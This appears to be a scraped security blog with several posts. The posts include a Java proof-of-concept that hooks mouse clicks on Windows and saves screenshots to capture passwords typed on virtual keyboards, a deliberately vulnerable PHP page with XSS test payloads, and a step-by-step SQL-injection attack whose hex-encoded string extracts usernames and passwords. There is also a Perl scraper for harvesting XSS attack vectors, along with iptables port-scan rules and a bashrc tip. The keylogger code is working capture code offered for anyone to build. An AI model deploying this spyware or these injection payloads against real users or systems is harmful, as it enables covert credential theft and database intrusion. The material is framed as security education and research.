Several papers offer guidelines on how to protect against keyloggers. There always are some lines according to the use of Virtual Keyboards. Malware has been seen in the wild, like the infamous ZEUS Trojan or Ardamax Keylogger, which offer screen capture capabilities.

The following lines of code are Proof-of-Concept code to demonstrate how easy Virtual Keyboard “Strokes” can be captured. Each Left-Mouse-Click captures a 100×100 pixel screen shot. What we will see, are some pictures of Virtual Keyboard screen shots. These will let you reconstruct an virtual entered password.

I just started Project Nemesis for demostration purposes. In the future there will be posted more stuff on Malware related topics, inlcuding Anti-Debugging and so stuff.

Now let’s have a look at the main class. I used JNA for Java Native Programming.
Code template can be found at http://stackoverflow.com/questions/3590226/working-example-of-jna-mouse-hook

package ProjectNemesis;

import java.io.File;
import java.text.SimpleDateFormat;
import java.util.Date;

import com.sun.jna.Native;
import com.sun.jna.NativeLong;
import com.sun.jna.Platform;
import com.sun.jna.Structure;
import com.sun.jna.platform.win32.BaseTSD.ULONG_PTR;
import com.sun.jna.platform.win32.Kernel32;
import com.sun.jna.platform.win32.User32;
import com.sun.jna.platform.win32.WinDef.HWND;
import com.sun.jna.platform.win32.WinDef.LRESULT;
import com.sun.jna.platform.win32.WinDef.WPARAM;
import com.sun.jna.platform.win32.WinUser.HHOOK;
import com.sun.jna.platform.win32.WinUser.HOOKPROC;
import com.sun.jna.platform.win32.WinUser.MSG;
import com.sun.jna.platform.win32.WinUser.POINT;

public class JNAMouseHook {

	private final User32 USER32INST;
	private final Kernel32 KERNEL32INST;

	private static LowLevelMouseProc mouseHook;
	private static ScreenFunctions s = new ScreenFunctions();
	private HHOOK hhk;
	private Thread thrd;
	private boolean threadFinish = true;
	private boolean isHooked = false;
	private static final int WM_MOUSEMOVE = 512;
	private static final int WM_LBUTTONDOWN = 513;
	private static final int WM_LBUTTONUP = 514;
	private static final int WM_RBUTTONDOWN = 516;
	private static final int WM_RBUTTONUP = 517;
	private static final int WM_MBUTTONDOWN = 519;
	private static final int WM_MBUTTONUP = 520;

	public static void main(String[] args) {
		JNAMouseHook j = new JNAMouseHook();
		j.setMouseHook();
	}

	public JNAMouseHook() {
		if (!Platform.isWindows()) {
			throw new UnsupportedOperationException(
					"Not supported on this platform.");
		}
		USER32INST = User32.INSTANCE;
		KERNEL32INST = Kernel32.INSTANCE;
		mouseHook = hookTheMouse();
		Native.setProtected(true);
	}

	public void unsetMouseHook() {
		threadFinish = true;
		if (thrd.isAlive()) {
			thrd.interrupt();
			thrd = null;
		}
		isHooked = false;
	}

	public boolean isIsHooked() {
		return isHooked;
	}

	public void setMouseHook() {
		thrd = new Thread(new Runnable() {
			@Override
			public void run() {
				try {
					if (!isHooked) {
						hhk = USER32INST.SetWindowsHookEx(14, mouseHook,
								KERNEL32INST.GetModuleHandle(null), 0);
						isHooked = true;
						MSG msg = new MSG();
						while ((USER32INST.GetMessage(msg, null, 0, 0)) != 0) {
							USER32INST.TranslateMessage(msg);
							USER32INST.DispatchMessage(msg);
							if (!isHooked)
								break;
						}
					} else
						System.out.println("The Hook is already installed.");
				} catch (Exception e) {
					System.err.println(e.getMessage());
					System.err.println("Caught exception in MouseHook!");
				}
			}
		}, "Named thread");
		threadFinish = false;
		thrd.start();
	}

	private interface LowLevelMouseProc extends HOOKPROC {
		LRESULT callback(int nCode, WPARAM wParam, MOUSEHOOKSTRUCT lParam);
	}

	public LowLevelMouseProc hookTheMouse() {
		return new LowLevelMouseProc() {
			@Override
			public LRESULT callback(int nCode, WPARAM wParam,
					MOUSEHOOKSTRUCT info) {
				if (nCode >= 0) {
					switch (wParam.intValue()) {
					case JNAMouseHook.WM_LBUTTONDOWN:
						Date dt = new Date();
						SimpleDateFormat df = new SimpleDateFormat(
								"yyyyMMddHHmmssS");
						String fn = df.format(dt) + ".jpg";

						System.out.println(s.getWindowTitle());
						s.makeScreenshot(info.pt.x, info.pt.y, 100, 100,
								new File("C:\\Screens\\" + fn));

						System.gc();

						break;
					default:
						break;
					}
					if (threadFinish == true) {
						USER32INST.PostQuitMessage(0);
					}
				}
				return USER32INST.CallNextHookEx(hhk, nCode, wParam,
						info.getPointer());
			}
		};
	}

	public class Point extends Structure {
		public class ByReference extends Point implements Structure.ByReference {
		};

		public NativeLong x;
		public NativeLong y;
	}

	public static class MOUSEHOOKSTRUCT extends Structure {
		public static class ByReference extends MOUSEHOOKSTRUCT implements
				Structure.ByReference {
		};

		public POINT pt;
		public HWND hwnd;
		public int wHitTestCode;
		public ULONG_PTR dwExtraInfo;
	}
}

Additional code sample for screen capture looks like that.

package ProjectNemesis;

import java.awt.AWTException;
import java.awt.Rectangle;
import java.awt.Robot;
import java.awt.image.BufferedImage;
import java.io.File;
import java.io.IOException;

import javax.imageio.ImageIO;

import com.sun.jna.Native;
import com.sun.jna.PointerType;
import com.sun.jna.platform.win32.WinDef.HWND;
import com.sun.jna.win32.StdCallLibrary;

public class ScreenFunctions {

	private Robot robot;
	private Rectangle rectangle;
	private BufferedImage image;

	public boolean makeScreenshot(int x, int y, int width, int height, File file) {
		boolean ok = false;
		try {
			rectangle = new Rectangle(x - width / 2, y - height / 2, width, height);

			robot = new Robot();
			image = robot.createScreenCapture(rectangle);
			ImageIO.write(image, "jpg", file);
			ok = true;
		} catch (AWTException | IOException e) {
			e.printStackTrace();
		}
		return ok;
	}

	public String getWindowTitle() {
		byte[] windowText = new byte[512];
		PointerType hwnd = User32.INSTANCE.GetForegroundWindow();
		User32.INSTANCE.GetWindowTextA(hwnd, windowText, 512);
		return Native.toString(windowText);
	}

	public interface User32 extends StdCallLibrary {
		User32 INSTANCE = (User32) Native.loadLibrary("user32", User32.class);

		HWND GetForegroundWindow();

		int GetWindowTextA(PointerType hWnd, byte[] lpString, int nMaxCount);
	}
}

Have fun, build it like you want, and ask if you have questions :-)
Bye folks

Hi folks,

found an interessting website from Microsoft which belongs to different Memory Limits for Windows Releases.

Have a look – http://msdn.microsoft.com/en-us/library/windows/desktop/aa366778(v=vs.85).aspx

hf

If you want to rid of typing “startx” after login to Backtrack 5, you could just add some extra lines into /root/.bashrc . As this is a problem I had some days ago I would like it to share with you. And you get rid of google (gg) Joke apart!

Add these lines to /root/.bashrc as follows. (BT5 GNOME)

if [ -z "$DISPLAY" ]; then
	startx
fi

-z returns true if $DISPLAY is still empty. The if statement is needed due to the fact, that if you start xterm .bashrc gets executed and you would get an Display error.

In regards to my Master Thesis, which is about the evaluation of the efficiency of Cross-Site-Scripting measures, I would like to introduce my assessment approach to you. This post is not about the definition of XSS neither about secure coding.

Part 1 comprises the definition of the assessment approach to evaluate the efficiency of XSS measures. I had the idea of taking the OWASP XSS Prevention Rules as Evaluation Criteria, which are related to:

The efficiency of Cross-Site-Scripting measures can only be provided, if these measures can successfully detect XSS

1. within HTML-Tags,
2. within HTML-Attributes,
3. within JavaScript-able Attributes,
4. within Style-Entities,
5. within URLs,
6. within encoded Payloads,
7. within HTTP-Headers (User-Agent, Referrer, …) and
8. within different HTTP-Methods (GET, POST, …).

The Process of Evaluation is build upon different series of tests and cases. Each series of tests represents one part of the Evaluation Criteria. Hence, there are eight series of tests comprising one or more series of cases. Additionally, I have developed vulnerable web applications and a set of different XSS attack payloads for each series. XSS payloads are widely distributed and available in the internet, e.g. http://ha.ckers.org/xss.html

An example of a vulnerable web application looks as listed below and is related to the test series #1 – XSS within HTML-Tags.

<html>
<body>
<?PHP
echo '<h3>Testing for Reflected XSS in Standard HTML Tag: ';
echo $_REQUEST['tag'];
echo '</h3>';
echo '<'.$_REQUEST['tag'].'>';
echo $_REQUEST['payload'];
echo '</'.$_REQUEST['tag'].'>';
?>
</body>
</html>

An example of a test case according to the test series above is as follows.

Test series: #1
Test case: #1
Tag: td
XSS Payload: “/>’/><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
HTTP-Request: ?tag=td&payload=”/>’/><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

The HTTP-Request is provided additionally. The relationship between the vulnerable script and the test case is created in this way.

Four products have been assessed:

1. Internet Explorer XSS-Filter
2. Firefox NoScript-Plugin
3. Mod_Security
4. IIS Request-Filter

Have a nice evening and get ready for the next parts. What will be discussed next? -> Testing results and its interpretations. Feedback is appreciated (gg) Questions are welcome!

In the meantime you can have a look at my German Master Thesis.

Master Thesis Download Link – Master_Thesis_2011_Anti-XSS_OnlineVersion.pdf
Presentation Download Link – MT_SCHRATT_Anti-XSS_2011.ppsx

Altough attacks are more and more evolving to the application layer, baseline security must be established as well. Usually one of the first steps taken is to build up a firewall. In this post I want to introduce, how port scans can be detected with iptables. nmap as one of the most popular port scanners, has the ability to enforce different types of scanning, like NULL-Scan, FIN-Scan or XMAS-Scan. To proper secure your hosts behind your firewall, you will have to successfully block port scanning. Here are some lines for you.

# NO flags
iptables -A INPUT -p tcp --tcp-flags ALL NONE

# FIN Scan
iptables -A INPUT -p tcp --tcp-flags ALL FIN

# XMAS 1
iptables -A INPUT -p tcp --tcp-flags ALL FIN,URG,PSH

# XMAS 2
iptables -A INPUT -p tcp --tcp-flags ALL URG,ACK,PSH,RST,SYN,FIN

# SYN, FIN flag set
iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN

# SYN, RST flags set
iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST

# FIN, RST flags set
iptables -A INPUT -p tcp --tcp-flags FIN,RST FIN,RST

# FIN flag set only
iptables -A INPUT -p tcp --tcp-flags ACK,FIN FIN

# PSH flag set only
iptables -A INPUT -p tcp --tcp-flags ACK,PSH PSH

# URG flag set only
iptables -A INPUT -p tcp --tcp-flags ACK,URG URG

I am going to write about network printer security and how printer insecurity could lead to a compromise of windows active directory. Some ideas of mine inlcude insecure configuration, usage of domain admin accounts, password security etc. Feel free to contribute!

I would like to demonstrate a sample SQL-Injection attack. SQL-Injection occurs if user input is not correctly validated. Sensitive data could be read from the database, or administrative operations could be executed. First have a look at the vulnerable application code listing:

function listBookmarks($searchTag,$s) {
	if($searchTag == NULL && $s == 0) {
		$sql = "SELECT title, url FROM `bookmarks`";
		if ($result = @mysql_query($sql)) {
			if (!$result = @mysql_query($sql)) {
				return 1;
			}

			if(@mysql_num_rows($result) > 0) {
				$bl = "<table>";
				$bl.= "<tr class=\"bookmark\"><td>Title</td><td>Site Address</td></tr>";
				while($b = @mysql_fetch_assoc($result)) {
					$bl .= "<tr><td style=\"padding-right:15px;\">".$b['title']."</td>
                    <td><a href=\"".$b['url']."\" target=\"_blank\">".$b['url']."</a></td></tr>";
				}
				$bl .= "</table>";
			} else {
				$bl = "No Bookmarks found!";
			}
		}
	} else {
		$bl = "No Bookmarks found!";		

		$sql = "SELECT id from tags where name like '%".htmlspecialchars($searchTag)."%'";

		if ($result = @mysql_query($sql)) {
			$a = @mysql_fetch_row($result);
		}

		if(@mysql_num_rows($result) > 0) {
			$sql = "SELECT title, url FROM `bookmarks` where tags like '%".$a[0]."%'";

			if ($resultb = @mysql_query($sql)) {
				if (!$resultb = @mysql_query($sql)) {
					return 1;
				}
				if(@mysql_num_rows($resultb) > 0) {
					$bl = "<table>";
					$bl.= "<tr class=\"bookmark\"><td>Title</td><td>Site Address</td></tr>";
					while($b = @mysql_fetch_assoc($resultb)) {
						$bl .= "<tr><td style=\"padding-right:15px;\">".$b['title']."</td>
                        <td><a href=\"".$b['url']."\" target=\"_blank\">".$b['url']."</a></td></tr>";
					}
					$bl .= "</table>";
				}
			}
		}
	}
	return $bl;
}

Are you able to identify the vulnerable lines of code? Let’s see what is happening if we start  to build our injection string. If an empty search is performed, all existing bookmarks will be printed. If a search string is provided, the SQL-Statement will be filled.

SELECT id from tags where name like '%search string%'

Because of the missing input validation, the first SQL-Injection is possible at this step.  Well, the next part requires to put on our thinking cap. The second SQL-Query will only be executed if the first one returns at least one line. As $a=@mysql_fetch_row($result); and is processed before the second query, we will have to manipulate the first result. $a must contain the injection string which has to be injected into the second statement to trigger the exploit. How can this be achieved?

An UNION ALL SELECT should satisfy our needs. We could use a random search string to get no bookmarks returned and append the injection string, as explained below.

kjahs' union all select 1 --

The “1″ represents a tag ID, which is usually returned by the first SQL-Query. Now, let’s assume that the query for the users’ DB my look like

select username,userpass from udb

Put all parts together and build the injection string. I would call it Double-SQL-Injection. (gg)

kjahs' union all select (select 0x612720756E696F6E20616C6C2073656C65637420757365726E616D652C75736572706173732066726F6D20756462202D2D20) from udb --

The hex-encoded string comprises an UNION ALL SELECT. The process of a search will now look like

-- First SQL-Query
SELECT id from tags where name like '%kjahs' union all select (select 0x612720756E696F6E20616C6C2073656C65637420757365726E616D652C75736572706173732066726F6D20756462202D2D20) from udb -- %'

-- Second SQL-Query
SELECT title, url FROM `bookmarks` where tags like '%a' union all select username,userpass from udb -- %'

As you perceive, the hex-encoded string gets decoded and represents the second, well-formed SQL-Injection.

Hallo an alle,

hier stelle ich eine kleine nette Präsentation zum Thema “Unterschied von IT- und Information-Security” bereit. Sehr oft sind die Unterschiede nicht so klar bzw. werden nicht verstanden. Begriffe und Definitionen können im angehängten PDF nachgelesen werden. Weiters findet sich auch eine Auflistung von Standards & Normen im Sicherheitsbereich.

Have fun! Downlaod Link – MfS-Enterprise_Security.pdf

Found some interesting lines in a jetty configuration file and just want to share it with you.

<Set name="Keystore"><SystemProperty name="jetty.home" default="." />/../xxx/conf/keystore</Set>
<Set name="Password">OBF:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</Set>
<Set name="KeyPassword">OBF:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</Set>

It is not the best idea to only obfuscate keystore passwords, isn’t it? (gg) But in this case jetty does not support encryption like MD5. So be sure to make your website secure from any vulnerability (LFI, SQL-Injection, Parameter Injection, …) which could affect your filesystem.

Any other hint for securing jetty is appreciated!

Have you ever tried to download all XSS Vectors from xssed.com?
I provide you the following solution:

The Perl Script below is named “xssdl” – a tool that parses the whole xssed.com archive and stores all XSS Attack Vectors to file. Then you are able to use grep or anything similar easily.

You can use this download link – xssdl.zip

#!/usr/bin/perl

#    xssdl - Parses and saves all XSS Attack Vectors from xssed.com
#    Copyright (C) 2011  Michael F. Schratt (bl4ckw0rm)
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
#    Contact:
#      mschratt@mfs-enterprise.com
#      http://twitter.com/#!/bl4ckw0rm

use strict;
use LWP;
use Term::ANSIColor;

# Header
print "----------------------------------------------------------------\n";
print "| XSS(DownLoader) parses all XSS Attack Vectors from XSSed.com |\n";
print "----------------------------------------------------------------\n";

# Vars
my $browser         = LWP::UserAgent->new;
my $urlArchive      = "http://xssed.com/archive/";
my $filenameXSS     = "";
my $filenameLOG     = "";

my $globPageID      = 0;
my $globMirrID      = 0;

# Debugging
my $DEBUG_F         = 0;

# Set UserAgent
$browser->agent("Mozilla/4.0 (compatible; MSIE 5.12; Mac_PowerPC)");

# Catch STRG-C
$SIG{INT} = \&exception;

# Parse Arguments
my $PAGE_A          = 0;
my $PAGE_Ae         = 0;
my $MIRROR_A        = 0;

while ( my $arg = shift @ARGV ) {
	if ( $arg eq '-v' ) {
		$DEBUG_F = 1;
	} elsif ( $arg eq '-p' ) {
		$PAGE_A = shift @ARGV;
    } elsif ($arg eq '-pe' ) {
        $PAGE_Ae = shift @ARGV;
	} elsif ( $arg eq '-m' ) {
		$MIRROR_A = shift @ARGV;
	} elsif ( $arg eq '-h' ) {
		usage();
	} else {
		usage();
	}
}

$filenameXSS     = "xssed_" . $PAGE_A ."_" .
                    $PAGE_Ae . "_" . $MIRROR_A . "_" . &getDate . ".txt";
$filenameLOG     = "xssed_" . $PAGE_A ."_" .
                    $PAGE_Ae . "_" . $MIRROR_A . "_" . &getDate . ".log";

if ($PAGE_A gt 0) {
	# Start at given page & mirror
	&processPage($PAGE_A, $MIRROR_A, $PAGE_Ae);
} else {
	&processPage(1,0,0);
}

exit 0;

# SubRoutines
sub usage {
	print "$0 -v -h -p firstpage -pe lastpage -m mirror\n";
    exit 0;
}

sub getDate {
    (my $sec,my $min,my $hour,my $mday,my $mon,
     my $year,my $wday,my $yday,my $isdst) = localtime(time);
    return sprintf("%4d%02d%02d%02d%02d%02d",
                   $year+1900,$mon+1,$mday,$hour,$min,$sec);
}

sub exception {
	$SIG{INT} = \&exception;

	&writeLog ("[-] ERR: Saving Status to Log\n", "red");
	&writeLog ("[-] ERR: Interupted at Page $globPageID / Mirror $globMirrID\n", "red");

	exit 1;
}

sub processPage {
	local(my $url = "", my $max = 0, my @mirrors = "", my $response = "",
	      my $data = "", my $pageID = shift, my $mirrorIDx = shift,
          my $pageIDe = shift);

	# Build URL
	$url = $urlArchive."page=$pageID/";
	&writeLog ("[+] A total of ", "red");
	$max = &getSites($url);
    if ($pageIDe eq 0) {
        $pageIDe = $max;
    }
	&writeLog ("$max sites to process\n", "red");

	do {
		# Set Global PageID for Tracing
		&setGlobPage($pageID);		

		&writeLog ("[+] Processing URL: $url\n", "red");

		$response = $browser->get($url); die "[-] Connot get $url --- ",
			    $response->status_line unless $response->is_success;
		$data = $response->content;

		if ($DEBUG_F eq 1) {
			print $data;
		}

		@mirrors = &getMirrors($data);
		&writeLog ("[+] Site $pageID/$max | ".($max-$pageID)." remaining\n", "red");
		while ($mirrorIDx <= scalar(@mirrors)-1) {
			# Set Global MirrorID for Tracing
			&setGlobMirr($mirrorIDx);
			&processMirror($mirrors[$mirrorIDx], $mirrorIDx+1, scalar(@mirrors));
			$mirrorIDx+=1;
	 	}
		$mirrorIDx = 0;

		$pageID+=1;
		$url = $urlArchive."page=$pageID/";
	} while ($pageID <= $pageIDe);
}

sub setGlobPage {
	local(my $pageID = shift);

	$globPageID = $pageID;
}

sub setGlobMirr {
	local(my $mirrID = shift);

	$globMirrID = $mirrID+1;
}

sub processMirror {
	local(my $murl = shift, my $response = "", my $data = "", my $cat = "",
	      my $xssURL = "", my $idx = shift, my $total = shift, my $status = "");

	&writeLog ("\t[*] Processing Mirror $idx\/$total: $murl\n", "green");

	$response = $browser->get($murl); die "[-] Connot get $murl --- ",
		    $response->status_line unless $response->is_success;
	$data = $response->content;

	if ($DEBUG_F eq 1) {
		print $data;
	}

	$cat = &getCategory($data);
	&writeLog ("\t[*] Category: $cat\n", "green");
	$xssURL = &getXssURL($data);
	$xssURL =~ s/<br>//g
	&writeLog ("\t[*] URL: $xssURL\n", "green");
	$status = &getStatus($data);
	&writeLog ("\t[*] Status: $status\n", "green");

	&writeFile("Status: ".&trim($status)."\tCategory: ".&trim($cat)."\tURL: ".&trim($xssURL));
}

sub getMirrors {
	local(my $data = shift, my $idx = 0, my @tmp = (), my $base = "http://xssed.com/mirror/");

	while( $data =~ m/<a href=\'\/mirror\/(.*?)\/\'/ig ) {
		$tmp[$idx++] = URI->new_abs( $1, $base );
 	}

	return(@tmp);
}

sub getStatus {
	local(my $data = shift, my $status = "");

	$data =~ m/.*Status:.*(\b(UNFIXED|FIXED))<\/.*/ig;
	$status = $1;

	return($status);
}

sub getSites {
	local(my $max = 0, my $tmp = 0, my $url = shift, my $response = "", my $data = "");

	$response = $browser->get($url); die "[-] Connot get $url --- ",
		    $response->status_line unless $response->is_success;
	$data = $response->content;

	while( $data =~ m/<a href=\'\/archive\/.*page=(.*?)\/\'/ig ) {
		$tmp = $1;
		if ($max < $tmp) { $max = $tmp; }
 	}

	return($max);
}

sub getCategory {
	local(my $data = shift, my $cat = "");

	$data =~ m/.*Category:\ (.*?)<\/.*/ig;
	$cat = $1;

	return($cat);
}

sub getXssURL {
	local(my $p = shift, my $xssUrl = "");

	$p =~ m/.*URL:\ (.*?)<\/.*/ig;
	$xssUrl = $1;

	return($xssUrl);
}

sub writeFile {
	local(my $content = shift);

	open (fHANDLE, ">>$filenameXSS");
 	print fHANDLE "$content\n";
	close(fHANDLE);
}

sub writeLog {
	local(my $content = shift, my $color = shift);

	open (lHANDLE, ">>$filenameLOG");
	print lHANDLE "$content";
	close(lHANDLE);

	print color $color;
	print $content;
	print color 'reset';
}

sub deleteFiles {
	unlink($filenameXSS);
	unlink($filenameLOG);
}

sub trim {
	my $string = shift;
	$string =~ s/^\s+//;
	$string =~ s/\s+$//;
	return $string;
}